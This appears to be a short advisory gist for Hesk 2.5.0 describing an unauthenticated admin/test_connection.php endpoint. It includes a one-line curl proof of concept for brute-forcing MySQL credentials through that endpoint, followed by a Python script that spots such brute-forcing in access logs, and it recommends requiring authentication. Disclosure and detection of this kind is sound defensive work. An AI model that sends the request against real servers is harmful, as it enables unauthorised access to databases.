Created
August 6, 2014 19:51
Hesk 2.5.0 Connection Brute Force
(*) There is no access control on the file test_connection.php, which tests MySQL connections (and also POP3 and SMTP). This gives an attacker the opportunity to run a dictionary brute-force attack, checking every possible combination of username/password and/or database name, without needing to open a real connection to the MySQL service.
(*) proof-of-concept:
curl 'http://www.website.com/admin/test_connection.php' -H 'Host: www.website.com' --data 'test=mysql&s_db_host=localhost&s_db_name=DATABASE&s_db_user=USERNAME&s_db_pass=PASSWORD&s_db_pfix=hesk_' --compressed
Where USERNAME, PASSWORD and DATABASE are the parameters to brute-force.
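Because the endpoint answers unauthenticated requests, the most practical signal for a defender is request volume: one source POSTing to admin/test_connection.php many times in a short window. The script below is an added detection example, not part of this gist or of Hesk; it parses a handful of constructed combined-format access log lines and flags any source address that exceeds an assumed threshold of POSTs to that path inside an assumed sliding window. The threshold, window length, sample addresses and timestamps are all assumptions chosen for illustration.

```python
"""Flag source addresses that repeatedly hit Hesk's admin/test_connection.php.

Added example, not code from the original gist or from Hesk. It parses
constructed Apache/nginx combined-format log lines and reports addresses that
POST to the unauthenticated connection-test endpoint more than `threshold`
times inside a sliding `window_seconds` window (both values are assumptions).
"""
import re
from collections import defaultdict, deque
from datetime import datetime

# Combined log format: ip - - [time] "METHOD path HTTP/x.y" status bytes
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)
TIME_FMT = "%d/%b/%Y:%H:%M:%S %z"
TARGET_PATH = "/admin/test_connection.php"  # path named in the advisory


def parse_line(line):
    """Return (ip, timestamp, method, path), or None if the line is not a log entry."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(m.group("time"), TIME_FMT)
    return m.group("ip"), ts, m.group("method"), m.group("path")


def find_bruteforcers(lines, threshold=5, window_seconds=60):
    """Return {ip: peak_count} for addresses whose POSTs to TARGET_PATH exceed
    `threshold` within any `window_seconds`-long sliding window."""
    recent = defaultdict(deque)  # ip -> timestamps of matching POSTs still in window
    flagged = {}
    for line in lines:
        parsed = parse_line(line)
        if parsed is None:
            continue  # skip unparseable lines rather than crash on them
        ip, ts, method, path = parsed
        # Ignore query strings so "?foo=bar" variants still match the path.
        if method != "POST" or path.split("?")[0] != TARGET_PATH:
            continue
        q = recent[ip]
        q.append(ts)
        # Evict timestamps that have fallen out of the sliding window.
        while q and (ts - q[0]).total_seconds() > window_seconds:
            q.popleft()
        if len(q) > threshold:
            flagged[ip] = max(flagged.get(ip, 0), len(q))
    return flagged


# Constructed sample: one address hammers the endpoint every 5 seconds,
# a second address uses it once (a legitimate admin checking settings).
SAMPLE_LOG = [
    '203.0.113.7 - - [06/Aug/2014:19:51:%02d +0000] '
    '"POST /admin/test_connection.php HTTP/1.1" 200 312' % s
    for s in range(0, 40, 5)
] + [
    '198.51.100.2 - - [06/Aug/2014:19:52:10 +0000] '
    '"POST /admin/test_connection.php HTTP/1.1" 200 312',
    '198.51.100.2 - - [06/Aug/2014:19:52:11 +0000] '
    '"GET /admin/index.php HTTP/1.1" 200 9000',
    "garbage line that does not parse",
]

if __name__ == "__main__":
    for ip, n in find_bruteforcers(SAMPLE_LOG).items():
        print(f"{ip}: {n} connection tests inside the window")
```

The sliding window is kept per source address with a deque, so memory stays bounded by the number of requests inside the window rather than the size of the log. In a real deployment the same logic would be fed from the web server's access log, and the address returned could be handed to a firewall or fail2ban-style blocker; the more complete fix is the one the advisory implies, namely requiring an authenticated admin session before test_connection.php does any work.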